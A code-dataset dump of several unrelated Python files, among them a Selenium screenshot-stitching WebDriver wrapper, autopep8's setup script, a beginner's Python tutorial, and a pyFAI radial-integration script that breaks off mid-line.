updated_results.append(EyesWebElement(element, self))
results = updated_results
return results
def find_element_by_id(self, id_):
# type: (tp.Text) -> EyesWebElement
"""
Finds an element by id.
        :param id_: The id of the element to be found.
"""
return self.find_element(by=By.ID, value=id_)
def find_elements_by_id(self, id_):
# type: (tp.Text) -> tp.List[EyesWebElement]
"""
Finds multiple elements by id.
:param id_: The id of the elements to be found.
"""
return self.find_elements(by=By.ID, value=id_)
def find_element_by_xpath(self, xpath):
# type: (tp.Text) -> EyesWebElement
"""
Finds an element by xpath.
:param xpath: The xpath locator of the element to find.
"""
return self.find_element(by=By.XPATH, value=xpath)
def find_elements_by_xpath(self, xpath):
# type: (tp.Text) -> tp.List[EyesWebElement]
"""
Finds multiple elements by xpath.
:param xpath: The xpath locator of the elements to be found.
"""
return self.find_elements(by=By.XPATH, value=xpath)
def find_element_by_link_text(self, link_text):
# type: (tp.Text) -> EyesWebElement
"""
Finds an element by link text.
:param link_text: The text of the element to be found.
"""
return self.find_element(by=By.LINK_TEXT, value=link_text)
def find_elements_by_link_text(self, text):
# type: (tp.Text) -> tp.List[EyesWebElement]
"""
Finds elements by link text.
:param text: The text of the elements to be found.
"""
return self.find_elements(by=By.LINK_TEXT, value=text)
def find_element_by_partial_link_text(self, link_text):
# type: (tp.Text) -> EyesWebElement
"""
Finds an element by a partial match of its link text.
:param link_text: The text of the element to partially match on.
"""
return self.find_element(by=By.PARTIAL_LINK_TEXT, value=link_text)
def find_elements_by_partial_link_text(self, link_text):
# type: (tp.Text) -> tp.List[EyesWebElement]
"""
Finds elements by a partial match of their link text.
:param link_text: The text of the element to partial match on.
"""
return self.find_elements(by=By.PARTIAL_LINK_TEXT, value=link_text)
def find_element_by_name(self, name):
# type: (tp.Text) -> EyesWebElement
"""
Finds an element by name.
:param name: The name of the element to find.
"""
return self.find_element(by=By.NAME, value=name)
def find_elements_by_name(self, name):
# type: (tp.Text) -> tp.List[EyesWebElement]
"""
Finds elements by name.
:param name: The name of the elements to find.
"""
return self.find_elements(by=By.NAME, value=name)
def find_element_by_tag_name(self, name):
# type: (tp.Text) -> EyesWebElement
"""
Finds an element by tag name.
:param name: The tag name of the element to find.
"""
return self.find_element(by=By.TAG_NAME, value=name)
def find_elements_by_tag_name(self, name):
# type: (tp.Text) -> tp.List[EyesWebElement]
"""
Finds elements by tag name.
:param name: The tag name to use when finding elements.
"""
return self.find_elements(by=By.TAG_NAME, value=name)
def find_element_by_class_name(self, name):
# type: (tp.Text) -> EyesWebElement
"""
Finds an element by class name.
:param name: The class name of the element to find.
"""
return self.find_element(by=By.CLASS_NAME, value=name)
def find_elements_by_class_name(self, name):
# type: (tp.Text) -> tp.List[EyesWebElement]
"""
Finds elements by class name.
:param name: The class name of the elements to find.
"""
return self.find_elements(by=By.CLASS_NAME, value=name)
def find_element_by_css_selector(self, css_selector):
# type: (tp.Text) -> EyesWebElement
"""
Finds an element by css selector.
:param css_selector: The css selector to use when finding elements.
"""
return self.find_element(by=By.CSS_SELECTOR, value=css_selector)
def find_elements_by_css_selector(self, css_selector):
# type: (tp.Text) -> tp.List[EyesWebElement]
"""
Finds elements by css selector.
:param css_selector: The css selector to use when finding elements.
"""
return self.find_elements(by=By.CSS_SELECTOR, value=css_selector)
def get_screenshot_as_base64(self):
# type: () -> tp.Text
"""
Gets the screenshot of the current window as a base64 encoded string
which is useful in embedded images in HTML.
"""
screenshot64 = self.driver.get_screenshot_as_base64()
display_rotation = self.get_display_rotation()
if display_rotation != 0:
logger.info('Rotation required.')
# num_quadrants = int(-(display_rotation / 90))
logger.debug('Done! Creating image object...')
screenshot = image_utils.image_from_base64(screenshot64)
# rotating
if display_rotation == -90:
screenshot64 = image_utils.get_base64(screenshot.rotate(90))
logger.debug('Done! Rotating...')
return screenshot64
def get_screesnhot_as_base64_from_main_frame(self):
# type: () -> tp.Text
"""
Make screenshot from main frame
"""
original_frame = self.frame_chain.clone()
self.switch_to.default_content()
screenshot64 = self.get_screenshot_as_base64()
self.switch_to.frames(original_frame)
return screenshot64
def extract_full_page_width(self):
# type: () -> int
"""
Extracts the full page width.
:return: The width of the full page.
"""
# noinspection PyUnresolvedReferences
default_scroll_width = int(round(self.driver.execute_script(
"return document.documentElement.scrollWidth")))
body_scroll_width = int(round(self.driver.execute_script("return document.body.scrollWidth")))
return max(default_scroll_width, body_scroll_width)
def extract_full_page_height(self):
# type: () -> int
"""
Extracts the full page height.
:return: The height of the full page.
IMPORTANT: Notice there's a major difference between scrollWidth and scrollHeight.
While scrollWidth is the maximum between an element's width and its content width,
scrollHeight might be smaller(!) than the clientHeight, which is why we take the
maximum between them.
"""
# noinspection PyUnresolvedReferences
default_client_height = int(round(self.driver.execute_script(
"return document.documentElement.clientHeight")))
# noinspection PyUnresolvedReferences
default_scroll_height = int(round(self.driver.execute_script(
"return document.documentElement.scrollHeight")))
# noinspection PyUnresolvedReferences
body_client_height = int(round(self.driver.execute_script("return document.body.clientHeight")))
# noinspection PyUnresolvedReferences
body_scroll_height = int(round(self.driver.execute_script("return document.body.scrollHeight")))
max_document_element_height = max(default_client_height, default_scroll_height)
max_body_height = max(body_client_height, body_scroll_height)
return max(max_document_element_height, max_body_height)
def get_current_position(self):
# type: () -> Point
"""
Extracts the current scroll position from the browser.
:return: The scroll position.
"""
return self._origin_position_provider.get_current_position()
def scroll_to(self, point):
# type: (Point) -> None
"""
Commands the browser to scroll to a given position.
:param point: The point to scroll to.
"""
self._origin_position_provider.set_position(point)
def get_entire_page_size(self):
# type: () -> tp.Dict[tp.Text, int]
"""
Extracts the size of the current page from the browser using Javascript.
:return: The page width and height.
"""
return {'width': self.extract_full_page_width(),
'height': self.extract_full_page_height()}
def set_overflow(self, overflow, stabilization_time=None):
# type: (tp.Text, tp.Optional[int]) -> tp.Text
"""
Sets the overflow of the current context's document element.
:param overflow: The overflow value to set. If the given value is None, then overflow will be set to
undefined.
:param stabilization_time: The time to wait for the page to stabilize after overflow is set. If the value is
None, then no waiting will take place. (Milliseconds)
:return: The previous overflow value.
"""
logger.debug("Setting overflow: %s" % overflow)
if overflow is None:
script = "var origOverflow = document.documentElement.style.overflow; " \
"document.documentElement.style.overflow = undefined; " \
"return origOverflow;"
else:
script = "var origOverflow = document.documentElement.style.overflow; " \
"document.documentElement.style.overflow = \"{0}\"; " \
"return origOverflow;".format(overflow)
# noinspection PyUnresolvedReferences
original_overflow = self.driver.execute_script(script)
logger.debug("Original overflow: %s" % original_overflow)
if stabilization_time is not None:
time.sleep(stabilization_time / 1000)
eyes_selenium_utils.add_data_overflow_to_element(self.driver, None, original_overflow)
return original_overflow
def wait_for_page_load(self, timeout=3, throw_on_timeout=False):
# type: (int, bool) -> None
"""
Waits for the current document to be "loaded".
:param timeout: The maximum time to wait, in seconds.
:param throw_on_timeout: Whether to throw an exception when timeout is reached.
"""
# noinspection PyBroadException
try:
WebDriverWait(self.driver, timeout) \
.until(lambda driver: driver.execute_script('return document.readyState') == 'complete')
except Exception:
logger.debug('Page load timeout reached!')
if throw_on_timeout:
raise
def hide_scrollbars(self):
# type: () -> tp.Text
"""
Hides the scrollbars of the current context's document element.
:return: The previous value of the overflow property (could be None).
"""
logger.debug('HideScrollbars() called. Waiting for page load...')
self.wait_for_page_load()
logger.debug('About to hide scrollbars')
return self.set_overflow('hidden')
@property
def frame_chain(self):
"""
Gets the frame chain.
:return: A list of Frame instances which represents the path to the current frame.
This can later be used as an argument to _EyesSwitchTo.frames().
"""
return self._frame_chain
def get_viewport_size(self):
# type: () -> ViewPort
"""
Returns:
The viewport size of the current frame.
"""
return eyes_selenium_utils.get_viewport_size(self)
def get_default_content_viewport_size(self, force_query=False):
# type: (bool) -> ViewPort
"""
Gets the viewport size.
:return: The viewport size of the most outer frame.
"""
if self._default_content_viewport_size and not force_query:
return self._default_content_viewport_size
current_frames = self.frame_chain.clone()
# If we're inside a frame, then we should first switch to the most outer frame.
# Optimization
if current_frames:
self.switch_to.default_content()
self._default_content_viewport_size = eyes_selenium_utils.get_viewport_size_or_display_size(self.driver)
if current_frames:
self.switch_to.frames(current_frames)
return self._default_content_viewport_size
def reset_origin(self):
# type: () -> None
"""
Reset the origin position to (0, 0).
:raise EyesError: Couldn't scroll to position (0, 0).
"""
self._origin_position_provider.push_state()
self._origin_position_provider.set_position(Point(0, 0))
current_scroll_position = self._origin_position_provider.get_current_position()
if current_scroll_position.x != 0 or current_scroll_position.y != 0:
self._origin_position_provider.pop_state()
raise EyesError("Couldn't scroll to the top/left part of the screen!")
def restore_origin(self):
# type: () -> None
"""
Restore the origin position.
"""
self._origin_position_provider.pop_state()
def save_position(self):
"""
Saves the position in the _position_provider list.
"""
self._position_provider.push_state()
def restore_position(self):
"""
Restore the position.
"""
self._position_provider.pop_state()
@staticmethod
def _wait_before_screenshot(seconds):
logger.debug("Waiting {} ms before taking screenshot..".format(int(seconds * 1000)))
time.sleep(seconds)
logger.debug("Finished waiting!")
def get_full_page_screenshot(self, wait_before_screenshots, scale_provider):
# type: (Num, ScaleProvider) -> Image.Image
"""
Gets a full page screenshot.
:param wait_before_screenshots: Seconds to wait before taking each screenshot.
:return: The full page screenshot.
"""
logger.info('getting full page screenshot..')
# Saving the current frame reference and moving to the outermost frame.
original_frame = self.frame_chain
self.switch_to.default_content()
self.reset_origin()
entire_page_size = self.get_entire_page_size()
# Starting with the screenshot at 0,0
EyesWebDriver._wait_before_screenshot(wait_before_screenshots)
part64 = self.get_screenshot_as_base64()
screenshot = image_utils.image_from_bytes(base64.b64decode(part64))
scale_provider.update_scale_ratio(screenshot.width)
pixel_ratio = 1.0 / scale_provider.scale_ratio
        need_to_scale = pixel_ratio != 1.0
if need_to_scale:
screenshot = image_utils.scale_image(screenshot, 1.0 / pixel_ratio)
# IMPORTANT This is required! Since when calculating the screenshot parts for full size,
# we use a screenshot size which is a bit smaller (see comment below).
if (screenshot.width >= entire_page_size['width']) and \
(screenshot.height >= entire_page_size['height']):
self.restore_origin()
self.switch_to.frames(original_frame)
logger.debug("Entire page has size as screenshot")
return screenshot
# We use a smaller size than the actual screenshot size in order to eliminate duplication
# of bottom scroll bars, as well as footer-like elements with fixed position.
screenshot_part_size = {'width': screenshot.width,
'height': max(screenshot.height - self._MAX_SCROLL_BAR_SIZE,
self._MIN_SCREENSHOT_PART_HEIGHT)}
logger.debug("Total size: {0}, Screenshot part size: {1}".format(entire_page_size,
screenshot_part_size))
entire_page = Region(0, 0, entire_page_size['width'], entire_page_size['height'])
screenshot_parts = entire_page.get_sub_regions(screenshot_part_size)
# Starting with the screenshot we already captured at (0,0).
stitched_image = Image.new('RGBA', (entire_page.width, entire_page.height))
stitched_image.paste(screenshot, box=(0, 0))
self.save_position()
for part in screenshot_parts:
# Since we already took the screenshot for 0,0
if part.left == 0 and part.top == 0:
logger.debug('Skipping screenshot for 0,0 (already taken)')
continue
logger.debug("Taking screenshot for {0}".format(part))
# Scroll to the part's top/left and give it time to stabilize.
self._position_provider.set_position(Point(part.left, part.top))
# self.scroll_to(Point(part.left, part.top))
EyesWebDriver._wait_before_screenshot(wait_before_screenshots)
# Since screen size might cause the scroll to reach only part of the way
current_scroll_position = self._position_provider.get_current_position()
logger.debug("Scrolled To ({0},{1})".format(current_scroll_position.x,
current_scroll_position.y))
part64 = self.get_screenshot_as_base64()
part_image = image_utils.image_from_bytes(base64.b64decode(part64))
if need_to_scale:
part_image = image_utils.scale_image(part_image, 1.0 / pixel_ratio)
stitched_image.paste(part_image, box=(current_scroll_position.x, current_scroll_position.y))
self.restore_position()
self.restore_origin()
self.switch_to.frames(original_frame)
return stitched_image
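    # Illustrative sketch of the stitching above (assumed numbers, not real defaults):
    # for an entire page of 1000x3000 px and a screenshot part size of 1000x900 px,
    # get_sub_regions() conceptually yields parts whose top offsets are 0, 900, 1800 and 2700;
    # each part is captured after scrolling to it and pasted into stitched_image at the
    # scroll position actually reached (which may be less than requested near the page bottom).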
def get_stitched_screenshot(self, element_region, wait_before_screenshots, scale_provider):
# type: (Region, int, ScaleProvider) -> Image.Image
"""
Gets a stitched screenshot for specific element
:param element_region: Region of required screenshot
:param wait_before_screenshots: Seconds to wait before taking each screenshot.
:param scale_provider: Scale image if needed.
:return: The full element screenshot.
"""
logger.info('getting stitched element screenshot..')
self._position_provider = self._eyes._element_position_provider
entire_size = self._position_provider.get_entire_size()
logger.debug("Element region: {}".format(element_region))
        # Firefox 60 and above screenshot the current frame, while other browsers screenshot
        # the viewport. We therefore scroll to the frame in the _will_switch_to method and
        # add the frame's left offset as a margin here.
# TODO: Refactor code. Use EyesScreenshot
if self._frame_chain:
if ((self.browser_name == 'firefox' and self.browser_version < 60.0)
or self.browser_name in ('chrome', 'MicrosoftEdge', 'internet explorer', 'safari')):
element_region.left += int(self._frame_chain.peek.location.x)
screenshot_part_size = {'width': element_region.width,
'height': max(element_region.height - self._MAX_SCROLL_BAR_SIZE,
self._MIN_SCREENSHOT_PART_HEIGHT)}
entire_element = Region(0, 0, entire_size['width'], entire_size['height'])
screenshot_parts = entire_element.get_sub_regions(screenshot_part_size)
viewport = self.get_viewport_size()
screenshot = image_utils.image_from_bytes(base64.b64decode(self.get_screenshot_as_base64()))
scale_provider.update_scale_ratio(screenshot.width)
pixel_ratio = 1 / scale_provider.scale_ratio
        need_to_scale = pixel_ratio != 1.0
if need_to_scale:
element_region = element_region.scale(scale_provider.device_pixel_ratio)
# Starting with element region size part of the screenshot. Use it as a size template.
stitched_image = Image.new('RGBA', (entire_element.width, entire_element.height))
for part in screenshot_parts:
logger.debug("Taking screenshot for {0}".format(part))
# Scroll to the part's top/left and give it time to stabilize.
self._position_provider.set_position(Point(part.left, part.top))
EyesWebDriver._wait_before_screenshot(wait_before_screenshots)
# Since screen size might cause the scroll to reach only part of the way
current_scroll_position = self._position_provider.get_current_position()
logger.debug("Scrolled To ({0},{1})".format(current_scroll_position.x,
current_scroll_position.y))
part64 = self.get_screenshot_as_base64()
part_image = image_utils.image_from_bytes(base64.b64decode(part64))
# Cut to viewport size the full page screenshot of main frame for some browsers
if self._frame_chain:
if (self.browser_name == 'firefox' and self.browser_version < 60.0
or self.browser_name in ('internet explorer', 'safari')):
# TODO: Refactor this to make main screenshot only once
frame_scroll_position = int(self._frame_chain.peek.location.y)
part_image = image_utils.get_image_part(part_image, Region(top=frame_scroll_position,
height=viewport['height'],
width=viewport['width']))
# We cut original image before scaling to prevent appearing of artifacts
part_image = image_utils.get_image_part(part_image, element_region)
if need_to_scale:
part_image = image_utils.scale_image(part_image, 1.0 / pixel_ratio)
# first iteration
if stitched_image is None:
stitched_image = part_image
continue
stitched_image.paste(part_image, box=(current_scroll_position.x, current_scroll_position.y))
self._position_provider = self._origin_position_provider
return stitched_image
@property
def switch_to(self):
return _EyesSwitchTo(self, self.driver.switch_to)
@property
def current_offset(self):
# type: () -> Point
"""
Return the current offset of the context we're in (e.g., due to switching into frames)
"""
x, y = 0, 0
for frame in self._frame_chain:
x += frame.location['x']
y += frame.location['y']
return Point(x, y)
def execute_script(self, script, *args):
return self.driver.execute_script(script, *args)
def get_window_size(self, windowHandle='current'):
return self.driver.get_window_size(windowHandle)
def set_window_size(self, width, height, windowHandle='current'):
self.driver.set_window_size(width, height, windowHandle)
def set_window_position(self, x, y, windowHandle='current'):
self.driver.set_window_position(x, y, windowHandle)
| 40.054545
| 116
| 0.63771
|
b30bc4235fdb74d9c9fbd729007fc4ebcc10583e
| 1,898
|
py
|
Python
|
vimfiles/bundle/vim-python/submodules/autopep8/setup.py
|
BHills15/vimrc
|
150b2e0bea7afd09226697a061206f8b812cf5cc
|
[
"MIT"
] | 1
|
2022-02-09T15:48:13.000Z
|
2022-02-09T15:48:13.000Z
|
vimfiles/bundle/vim-python/submodules/autopep8/setup.py
|
BHills15/vimrc
|
150b2e0bea7afd09226697a061206f8b812cf5cc
|
[
"MIT"
] | null | null | null |
vimfiles/bundle/vim-python/submodules/autopep8/setup.py
|
BHills15/vimrc
|
150b2e0bea7afd09226697a061206f8b812cf5cc
|
[
"MIT"
] | 1
|
2022-02-09T15:49:18.000Z
|
2022-02-09T15:49:18.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Setup for autopep8."""
import ast
import io
from setuptools import setup
INSTALL_REQUIRES = (
['pycodestyle >= 2.3']
)
def version():
"""Return version string."""
with io.open('autopep8.py') as input_file:
for line in input_file:
if line.startswith('__version__'):
return ast.parse(line).body[0].value.s
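# Illustrative example (hypothetical line, not quoted from autopep8.py): for a line such as
# __version__ = '1.5.7'
# the ast.parse(...).body[0].value.s expression above evaluates to the string '1.5.7'.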
with io.open('README.rst') as readme:
setup(
name='autopep8',
version=version(),
description='A tool that automatically formats Python code to conform '
'to the PEP 8 style guide',
long_description=readme.read(),
license='Expat License',
author='Hideo Hattori',
author_email='hhatto.jp@gmail.com',
url='https://github.com/hhatto/autopep8',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Software Development :: Quality Assurance',
],
keywords='automation, pep8, format, pycodestyle',
install_requires=INSTALL_REQUIRES,
test_suite='test.test_autopep8',
py_modules=['autopep8'],
zip_safe=False,
entry_points={'console_scripts': ['autopep8 = autopep8:main']},
)
| 32.169492
| 79
| 0.578504
|
47a98d71cd65b0005881e7b1da2b8b415c81f3b1
| 757
|
py
|
Python
|
fxwebgen/imaging.py
|
tiliado/fxwebgen
|
5d1c5120b27fc13b6b45ee4e0017771271c3c3e0
|
[
"BSD-2-Clause"
] | null | null | null |
fxwebgen/imaging.py
|
tiliado/fxwebgen
|
5d1c5120b27fc13b6b45ee4e0017771271c3c3e0
|
[
"BSD-2-Clause"
] | 13
|
2018-08-06T15:25:50.000Z
|
2019-04-14T14:09:22.000Z
|
fxwebgen/imaging.py
|
tiliado/fxwebgen
|
5d1c5120b27fc13b6b45ee4e0017771271c3c3e0
|
[
"BSD-2-Clause"
] | null | null | null |
# Copyright 2018 Jiří Janoušek <janousek.jiri@gmail.com>
# Licensed under BSD-2-Clause license - see file LICENSE for details.
from typing import Optional
from PIL import Image
from resizeimage import resizeimage
def create_thumbnail(input_file: str, output_file: str, width: Optional[int], height: Optional[int]) -> None:
with open(input_file, 'rb') as fh:
img = Image.open(fh)
if width and height:
img = resizeimage.resize_thumbnail(img, [width, height])
elif width:
img = resizeimage.resize_width(img, width)
elif height:
img = resizeimage.resize_height(img, height)
else:
raise ValueError('Width or height must be specified.')
img.save(output_file)
| 34.409091
| 109
| 0.67107
|
386ed6587bf5fee377824cd91d9a6aa3413ccfd0
| 1,639
|
py
|
Python
|
example/example_flow.py
|
rdcli/rdc.etl
|
8aa70c1f31f4bc18b2e9e37d96db39041e4b8eb8
|
[
"Apache-2.0"
] | 7
|
2015-11-10T21:28:07.000Z
|
2021-03-16T17:51:16.000Z
|
example/example_flow.py
|
rdcli/rdc.etl
|
8aa70c1f31f4bc18b2e9e37d96db39041e4b8eb8
|
[
"Apache-2.0"
] | 4
|
2018-01-29T07:23:07.000Z
|
2018-01-29T07:23:43.000Z
|
example/example_flow.py
|
rdcli/rdc.etl
|
8aa70c1f31f4bc18b2e9e37d96db39041e4b8eb8
|
[
"Apache-2.0"
] | 2
|
2016-11-09T05:14:05.000Z
|
2017-07-22T13:25:56.000Z
|
# -*- coding: utf-8 -*-
#
# Copyright 2012-2014 Romain Dorgueil
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from rdc.etl.extra.example import Harness, build_producer, run
from rdc.etl.io import STDIN2
from rdc.etl.status.console import ConsoleStatus
from rdc.etl.transform.flow.sort import Sort
from rdc.etl.transform.flow.sortedjoin import SortedJoin
from rdc.etl.transform.util import Log
print('#################')
print('# Software sort #')
print('#################')
print
print('Producer -> Sort -> Log')
h = Harness()
h.status.append(ConsoleStatus())
p1 = build_producer('Producer 1')
h.add_chain(p1, Sort(key=('id',)), Log())
run(h)
print('###############')
print('# Sorted Join #')
print('###############')
print
print("Producer1 -> Sort -(stdin)---> SortedJoin --> Log")
print("Producer2 -> Sort -(stdin2)-'")
h = Harness()
h.status.append(ConsoleStatus())
p1 = build_producer('Producer 1')
p2 = build_producer('Producer 2', get_value=lambda id: int(id) * 42, value_name='price')
sj = SortedJoin(key=('id', ))
h.add_chain(p1, Sort(key=('id',)), sj, Log())
h.add_chain(p2, Sort(key=('id',)), output=(sj, STDIN2, ))
run(h)
| 31.519231
| 88
| 0.687614
|
7ca09d3a18bc2078df525b6c198f3189a4c775f8
| 3,008
|
py
|
Python
|
2-Conditional Logic and more basics.py
|
Alirezak2n/Python-Tutorials
|
28c6b40c7237032f80c4f0556ad1bcaceccef088
|
[
"MIT"
] | null | null | null |
2-Conditional Logic and more basics.py
|
Alirezak2n/Python-Tutorials
|
28c6b40c7237032f80c4f0556ad1bcaceccef088
|
[
"MIT"
] | null | null | null |
2-Conditional Logic and more basics.py
|
Alirezak2n/Python-Tutorials
|
28c6b40c7237032f80c4f0556ad1bcaceccef088
|
[
"MIT"
] | null | null | null |
# If Operator
if "Hello" and 5 :
print("Alireza Is Smart ")
elif 2 == 3:
print("ZOOOOOO")
else:
print("WOW")
# Ternary Operator or Conditional expression
#condition_if_true if condition else condition_if_false
fact="alireza will be successfull" if 5 else "Whatever"
print(fact)
print("aaa") if 2==3 else print("sss")
# Short Circuiting
if True or False:
print("second part does n't matter due to short circuiting")
# logical operator
print(4<3)
print(4==5)
print('a'<'b')
print('c'<'b')
print(1<=1)
print(1!=2)
print(not (True))
print(10 == 10.0) # should have same value
print(10 is 10.0) # should be exactly the same
a = [1,2,3]
b = [1,2,3]
print(a is b) # false because they are in different memory space
print([] is []) # two list in two different space
# Truthy and Falsy
print(bool("Hello"))
print(bool(5))
print(bool(""))
print(bool(0))
# For Operator
for item in [1,2]: # item can be anything, it's just a variable
for x in {'name': 'Alireza', 'age': 25,
'can_do it': True}.items(): # as a dictionary we can use .keys or .values too
print(item, x)
key, value = x
print(key, value)
    for key,value in {'name':'Alireza','age':25,'can_do it':True}.items(): # another way: unpack directly without the extra line
        print(key,value) # only collections (list, dict, tuple, set, string) are iterable, not int etc.
print(item)
print(range(100))
print(range(0,100)) # both of them are same
for _ in range(10,0,-2): # if we want to do reverse we should take care of our range to start from big to small
print(_)
print(list(range(10)))
# Enumerate
for i,j in enumerate("Alireza"): # its like range but gives the index too
print(i,j)
if j=='r':
print(f'the index of r is {i}')
for i in enumerate([1,2,3]):
print(i)
# While
i = 0
while i < 1:
print(i)
i+=1
else:
print('DOne')
# Break,Pass,Continue
for item in [1,2,3]:
print(item)
break # it will come out of the loop completely
for item in [1,2,3]:
continue # it will come out of current loop and start again at loop
print(item)
for item in [1,2,3]:
    pass # does nothing; acts as a placeholder so an empty loop body doesn't raise an error
# Variable and Constant and dunder
PI = 3.14 # Constant, it means it should not be changed
pi = 3.14 # a variable
a, b, c = 1, 2, 3
print(c, a, b)
__pi__ = 3.14 # a dunder name; better not to create these yourself
# Expressions and Statements
iq = 100 / 20 # 100/20 is an expression but the whole line is a statement
# Augmented Assignment Operator
some_value = 5
# some_value = some_value + 2
print(some_value)
some_value += 2 # operator comes in the left of the equation
print(some_value)
some_value -= 2
print(some_value)
# Math Functions
print(round(3.4))
print(round(3.6))
print(abs(-16))
# Complex
# Binary
print(bin(5))
print((int('0b101', 2)))
| 28.923077
| 140
| 0.641955
|
8369da3f4270cd37e877812174d5d850763e4967
| 1,703
|
py
|
Python
|
python/pred.py
|
neuralsystems/PRED
|
b3fb5e2604b88f44173767d8cf77aaff5171a7dc
|
[
"CC0-1.0"
] | null | null | null |
python/pred.py
|
neuralsystems/PRED
|
b3fb5e2604b88f44173767d8cf77aaff5171a7dc
|
[
"CC0-1.0"
] | null | null | null |
python/pred.py
|
neuralsystems/PRED
|
b3fb5e2604b88f44173767d8cf77aaff5171a7dc
|
[
"CC0-1.0"
] | null | null | null |
"""
# Author: Aarush Mohit Mittal
# Contact: aarush (dot) mohit (at) gmail (dot) com
# Version: 0.1
"""
"""
Changelog:
v0.1 (2021-08-12):
- Initial release with class-vector numpy support
"""
import numpy as np
from itertools import combinations
def pred(data):
'''
Description:
This function calculates Class-Vector Pairwise Relative Distance (PRED) from a 2-d or 3-d arrays of any size.
Arguments:
1. data: 2-d or 3-d numpy array of any size. For 3-d arrays, values along the 3rd dimension are used as
arrays for each Class and Vector combination. There must be at least 2 rows and 2 columns. Each column is
considered as a Class and each row is considered as a Vector.
Returns:
1. S: S is a column array of length n*(n-1)/2, where n = data.shape[0], corresponding to all Vector pairs.
Each value of S is averaged over all m*(m-1)/2 pairs of Classes, where m = data.shape[1]. NaNs are ignored
while calculating the mean.
'''
n_row = data.shape[0]
n_col = data.shape[1]
row_comb = list(combinations(np.arange(n_row), 2))
col_comb = list(combinations(np.arange(n_col), 2))
s = np.zeros((len(row_comb), 1))
for i, row_pair in enumerate(row_comb):
temp_s = []
for col_pair in col_comb:
temp_data = data[row_pair, :][:, col_pair][:]
temp_s.append(computepred(temp_data))
s[i] = np.nanmean(temp_s)
return s
def computepred(data):
d_2 = np.linalg.norm(data[0, 0] - data[1, 1]) ** 2 + np.linalg.norm(data[0, 1] - data[1, 0]) ** 2
d_1 = np.linalg.norm(data[0, 0] - data[1, 0]) ** 2 + np.linalg.norm(data[0, 1] - data[1, 1]) ** 2
return (d_2 - d_1) / (d_2 + d_1)
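# A minimal usage sketch (illustrative shapes, not taken from the module above):
if __name__ == '__main__':
    example = np.random.rand(4, 3, 10)   # 4 Vectors (rows) x 3 Classes (columns), 10-d arrays
    print(pred(example).shape)           # -> (6, 1): one PRED value per pair of the 4 Vectors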
| 34.06
| 113
| 0.641221
|
42c1676b68d404546793b95595fa1d97cf51f506
| 4,301
|
py
|
Python
|
apps/waxs_integrate.py
|
alexbjorling/nanomax-analysis-utils
|
e208d098243e28a90004c6e1c5fb69251177d23e
|
[
"MIT"
] | 3
|
2017-07-19T10:25:26.000Z
|
2019-12-17T13:47:06.000Z
|
apps/waxs_integrate.py
|
alexbjorling/nanomax-analysis-utils
|
e208d098243e28a90004c6e1c5fb69251177d23e
|
[
"MIT"
] | 1
|
2021-04-07T10:00:33.000Z
|
2021-04-07T10:20:36.000Z
|
apps/waxs_integrate.py
|
alexbjorling/nanomax-analysis-utils
|
e208d098243e28a90004c6e1c5fb69251177d23e
|
[
"MIT"
] | 1
|
2020-10-15T12:05:42.000Z
|
2020-10-15T12:05:42.000Z
|
"""
Script which radially integrates the 2D data contained in a hdf5 file
or list of files.
"""
import pyFAI, fabio
import h5py
import numpy as np
import os, time, sys, argparse
### Parse input
parser = argparse.ArgumentParser(
description='This script integrates all detector frames in a hdf5 file or list of files.',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('poni_file', type=str,
help='The pyFAI calibration file. Determines what data to take from the input file.')
parser.add_argument('input_files', type=str, nargs='*',
help='The file(s) containing the input data. They all have to be in the same folder unless an absolute output path is given.')
parser.add_argument('mask_file', type=str,
help='Mask file, edf format from pyFAI.')
parser.add_argument('--output_folder', type=str, dest='output_folder', default=None,
                    help='Output folder. If relative, it refers to the input folder. By default, uses an analog of the input folder under ../../process/radial_integration/<sample name>.')
parser.add_argument('--nbins', type=int, dest='nbins', default=2048,
help='Number of q bins.')
args = parser.parse_args()
### work out where the input folder is and if it is unique if needs be
if (not args.output_folder) or (not args.output_folder[0] == '/'):
input_folders = [os.path.dirname(f) for f in args.input_files]
input_folders = list(set(input_folders))
if not len(input_folders) == 1:
        raise ValueError('Since the files are in different places, you have to specify an absolute output folder.')
input_folder = input_folders[0]
### work out where to put the data
if not args.output_folder:
output_folder = os.path.join(input_folder.split('/raw/')[0],
'process/radial_integration',
os.path.basename(os.path.abspath(input_folder)))
elif args.output_folder[0] == '/':
# absolute path
output_folder = args.output_folder
else:
# relative path
output_folder = os.path.abspath(os.path.join(input_folder, args.output_folder))
### define some helper functions
def dict_walk(dct, ignore=[]):
"""
Recursively walks through a dict, returning each non-dict value.
"""
    if isinstance(ignore, str):
ignore = [ignore,]
for k, v in dct.items():
if hasattr(v, 'items'):
if v.name.split('/')[-1] in ignore:
continue
for v_ in dict_walk(v, ignore=ignore):
yield v_
else:
yield v
def images(fp, shape=None, ignore=[]):
"""
Iterates over the 2D images, optionally of a certain shape, of
an hdf5 file.
"""
for v in dict_walk(fp, ignore=ignore):
if len(v.shape) >= 2 and (shape is None or v.shape[-2:] == shape):
if len(v.shape) == 2:
v = np.reshape(v, (1,)+v.shape)
for i, im in enumerate(v):
print('image %i'%i)
yield im
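# Illustrative note (hypothetical file layout): for an hdf5 file containing a dataset of
# shape (N, 195, 487) outside any group named 'instrument', images(fp, shape=(195, 487),
# ignore='instrument') yields the N detector frames one at a time, while everything under
# an 'instrument' group is skipped by dict_walk().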
### Do the work
integrator = pyFAI.load(args.poni_file)
for input_file in args.input_files:
inputfn = os.path.basename(input_file)
print('*** Integrating %s' % inputfn)
outputfn = inputfn.split('.')[0] + '_waxs.' + inputfn.split('.')[-1]
output_file = os.path.join(output_folder, outputfn)
assert '/raw/' not in output_file
if not os.path.exists(os.path.dirname(output_file)):
